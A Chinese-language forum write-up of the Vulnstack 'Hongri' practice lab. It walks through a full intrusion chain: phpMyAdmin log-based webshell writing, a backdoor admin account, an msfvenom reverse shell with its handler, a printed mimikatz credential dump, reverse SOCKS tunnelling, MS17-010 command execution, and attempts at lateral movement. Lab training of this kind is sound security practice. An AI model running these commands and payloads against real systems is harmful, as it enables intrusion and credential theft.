红日靶场一的wp

lurker   ·   发表于 2021-08-12 15:42:53   ·   技术文章投稿区

前言

最近终于不是很忙了,抽时间复现了一下红日的靶场,一方面是熟练技术,另一方面争取在练习中填充自己的知识库。本人菜鸡,只是记录一下复现过程,大佬勿喷。

参考文章

最近在关注whoami大佬的内网渗透相关文章,本篇也是复现之一。
https://www.freebuf.com/articles/network/242277.html
https://www.freebuf.com/articles/web/280775.html

靶场以及环境地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境拓扑图


攻击机kali:
ip:192.168.66.128
VM1 Web服务器:
外网ip:192.168.66.37
内网ip:192.168.52.143
VM2 域成员:
内网ip:192.168.52.141
VM3 域控:
内网ip:192.168.52.138

外网渗透

首先进行信息搜集,御剑后台扫描

发现有phpmyadmin,phpinfo,进去看一下
phpinfo中看到真实ip,绝对路径等信息
C:/phpstudy/WWW/phpinfo.php

进入phpmyadmin

后台直接弱口令,root,root,进入后台

phpmyadmin后台getshell的常用手段有以下几种方式:

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

执行以下sql语句
show variables like '%secure%';


发现secure_file_priv=NULL,没有写入权限,无法用select into outfile方法写入shell。
试试利用全局变量general_log去getshell
show variables like '%general%';

我们将全局日志开启并将保存日志的目录设为web目录
set global general_log=on;

set global general_log_file='C:/phpStudy/WWW/hack.php';

设置成功

将一句话木马写入hack.php
select ''

测试成功

蚁剑连接成功

竟然是administrator权限

发现还有一个yxcms,查看一下

这是他的一个模板,公告信息暴露了后台登录地址和默认账户密码
后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456
进入后台

发现在前台模板这里可以编辑网页

写入一句话木马

接下来就是找到这个网页的路径,继续御剑扫描

去robots.txt看看有没有什么敏感文件和路径

session:

http://192.168.66.37/yxcms/protected/apps/default/view/default/acomment.php 找到了刚才编辑的文件

测试一下能否连接

测试成功,可以链接进去

回到蚁剑,进行信息搜集

ipconfig /all 查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \192.168.xx.xx\ipc$ “” /user:”” 与192.168.xx.xx建立空连接
net use \192.168.xx.xx\c$ “密码” /user:”用户名” 建立c盘共享
dir \192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group “domain admins” /domain 查看域管理员的名字
net group “domain computers” /domain 查看域中的其他主机名
net group “doamin controllers” /domain 查看域控制器(可能有多台)






发现了192.168.52.0/24这个网段,存在域环境
新添加一个用户,加入管理员组
net user test Hack1234! /add
net localgroup administrators test /add
net localgroup administrators

查看3389端口是否开启
netstat -ano |find “3389”

没有开启输入如下命令开启
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
如果开启防火墙,我们可以反弹一个msf的shell回来,然后用enable_rdp尝试关闭防火墙。
先生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.66.128 lport=4444 -f exe >shell.exe

利用蚁剑上传到目标机器

kali设置好监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.66.128
set lport 4444
run
蚁剑执行shell.exe

收到反弹的shell

getsystem提权一下,成功拿到系统权限

run post/windows/manage/enable_rdp 关闭防火墙

打开远程桌面

用刚才添加的用户登录

利用mimikatz抓取密码
这里我利用msf自己的kiwi模块
首先将进程迁移到一个稳定的x64的SYSTEM权限进程

migrate 380
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

uthentication Id : 0 ; 12204332 (00000000:00ba392c)
Session           : RemoteInteractive from 2
User Name         : test
Domain            : STU1
Logon Server      : STU1
Logon Time        : 2021/8/12 14:33:17
SID               : S-1-5-21-1982601180-2087634876-2293013296-1001
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : STU1
         * LM       : 748d60a86f6283237e51f0bf38bde884
         * NTLM     : c98186bcd6e6b2536104502945d0db69
         * SHA1     : 72252d59f7fbe785138c69bdaeeedce999b07102
        tspkg :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        wdigest :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        kerberos :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        ssp :
        credman :

Authentication Id : 0 ; 12204300 (00000000:00ba390c)
Session           : RemoteInteractive from 2
User Name         : test
Domain            : STU1
Logon Server      : STU1
Logon Time        : 2021/8/12 14:33:17
SID               : S-1-5-21-1982601180-2087634876-2293013296-1001
        msv :
         [00000003] Primary
         * Username : test
         * Domain   : STU1
         * LM       : 748d60a86f6283237e51f0bf38bde884
         * NTLM     : c98186bcd6e6b2536104502945d0db69
         * SHA1     : 72252d59f7fbe785138c69bdaeeedce999b07102
        tspkg :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        wdigest :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        kerberos :
         * Username : test
         * Domain   : STU1
         * Password : Hack1234!
        ssp :
        credman :

Authentication Id : 0 ; 1978767 (00000000:001e318f)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2021/8/12 12:58:25
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : GOD
         * LM       : 624aac413795cdc17e51f0bf38bde884
         * NTLM     : 92f7e7d670d3968e70bb3215760678dd
         * SHA1     : 8a2023f0b434f3125481aaa9c226933f7837f9f9
        tspkg :
         * Username : Administrator
         * Domain   : GOD
         * Password : Test1234!
        wdigest :
         * Username : Administrator
         * Domain   : GOD
         * Password : Test1234!
        kerberos :
         * Username : Administrator
         * Domain   : GOD.ORG
         * Password : Test1234!
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2021/8/12 12:57:01
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2021/8/12 12:57:01
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : STU1$
         * Domain   : GOD
         * NTLM     : fc38c6ad256874216d849314f65cbde1
         * SHA1     : 5ec637456b9d71a582a806667137184b04351a29
        tspkg :
        wdigest :
         * Username : STU1$
         * Domain   : GOD
         * Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e 
        kerberos :
         * Username : stu1$
         * Domain   : GOD.ORG
         * Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e 
        ssp :
        credman :

Authentication Id : 0 ; 50916 (00000000:0000c6e4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2021/8/12 12:57:00
SID               : 
        msv :
         [00000003] Primary
         * Username : STU1$
         * Domain   : GOD
         * NTLM     : fc38c6ad256874216d849314f65cbde1
         * SHA1     : 5ec637456b9d71a582a806667137184b04351a29
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2021/8/12 12:57:00
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : STU1$
         * Domain   : GOD
         * Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e 
        kerberos :
         * Username : stu1$
         * Domain   : GOD.ORG
         * Password : 4c e7 fb b8 6d d9 28 58 2d 03 1d b1 ad 65 b3 29 b2 27 1a 12 d5 39 89 b9 d0 a2 4e 33 6b 89 d5 fe fe a3 fd 7b c2 c5 63 71 41 4b 5e fc 09 cd 3f 8f c6 80 9e 05 b3 e4 7d 20 0b 43 8a 4a a3 72 4f bf 7e b9 77 eb e1 ce 22 3e 0f f0 20 e4 b2 5e e6 ff 43 c1 bf 0f c1 69 ff 2e 5d 02 c7 d0 f0 6f 08 3f 9c 8c c2 bd d6 35 36 ce 59 f5 9b d4 08 d3 6c 0c a5 36 4d a6 5e da cb b4 73 3b d6 f3 a1 91 3c 83 7a e9 38 1a bd 73 bd 33 07 0b 3f 72 56 6f 90 2a cd 06 a0 17 49 59 26 52 c6 67 da 92 0c 0d 9f 2d 57 60 55 6a 74 a7 68 6e 52 06 67 d4 43 3d cd 50 d0 73 22 a3 40 ea 3a c7 45 57 67 df ae 31 a8 94 cf 28 78 05 b8 8f 24 81 4f e9 ee 1c 04 09 30 15 16 7d 5d db 2d 7b 32 f4 fb 83 34 c2 fa 6f 61 e8 1b 7b bd 28 12 c4 34 9d 5a b1 dc dc 67 41 49 6e 
        ssp :
        credman :

可知
域控账户:Administrator
密码为:Test1234!

横向移动:

for /L %I in (1,1,254) DO <span class="label label-primary">@ping</span> -w 1 -n 1 192.168.52.%I | findstr "TTL="

探测到三台主机,其中一台是以获取到的目标机器ip:192.168.52.143
给msf添加路由run autoroute -s 192.168.52.0/24

发现另外两Ip 192.168.52.141 192.168.52.138
我们利用获取到的win7作为跳板机,开启隧道,让我们kali的其他工具可以进入内网进行攻击
我们利用ew开启隧道
upload /home/kali/ew/ew_for_Win.exe c://

在kali和跳板机分别配置
kali ./ew_for_linux64 -s rcsocks -l 1080 -e 1234
WIN7 ew_for_Win.exe -s rssocks -d 192.168.66.128 -e 1234


配置proxychains的socks5为1080
利用Nmap进行信息搜集

这里我直接尝试检测445端口是否开发,一般可以检测一下445 139 之类的端口
直接用 auxiliary/scanner/smb/smb_ms17_010 模块检测

set rhosts 192.168.52.141
run
set rhosts 192.168.52.138
run


发现都开放,经过测试直接打打不开,所以用另一条思路。
前面拿到了域控账户密码,尝试使用远程桌面的方式
nmap扫描3389端口发现关闭

使用msf的 auxiliary/admin/smb/ms17_010_command 模块打开
set rhosts 192.168.52.141
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
这里注意转义“\”

成功执行

可以打开远程桌面

添加一个账户即可,也可以使用域控用户和密码登录


域管理员为

域控ip为192.168.52.138

接下来尝试进入控制域控
和进入域成员操作一样,尝试打开3389端口
发现失败了,换个思路
先用win7连接域控的c盘共享
net use \\192.168.52.138\c$ "Test1234!" /user:"administrator"
dir \\192.168.52.138\c$

将win7主机上的shell.exe上传到域控上
copy c:\phpstudy\www\shell.exe \\192.168.52.138\c$

启动一个计划任务,在kali设置监听获取反弹shell,我这里执行失败了
schtasks /create /tn “test” /tr C:\shell.exe /sc once /st 18:05 /S 192.168.52.138 /RU System /u administrator /p “Test1234!”
继续换另一个思路,感觉域控开了防火墙,使用sc远程关闭防火墙
sc \192.168.52.138 create unablefirewall binpath= “netsh advfirewall set allprofiles state off”sc \192.168.52.138 start unablefirewall
还是失败了,具体原因之后会再复盘一下
看到有老哥用CS直接获取,之后会取练习一下CS,尝试获取

总结

这个靶场比较简单,虽然最后域控没拿下,但是有几个点还是不错的。首先phpmyadmin的getshell,其次就是msf的一些功能模块,通过练习更加熟悉。当然,横向渗透的时候,共享文件夹。共享C盘,sc,schtasks的练习使用,也算是有不少的收获。接下来会练习使用CS,希望之后这类问题可以用CS搞定。

用户名金币积分时间理由
Track-聂风 35.00 0 2021-08-14 15:03:17 投稿活动额外打赏
Track-聂风 70.00 0 2021-08-14 15:03:03 一个受益终生的帖子~~

打赏我,让我更有动力~

0 Reply   |  Until 5个月前 | 423 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.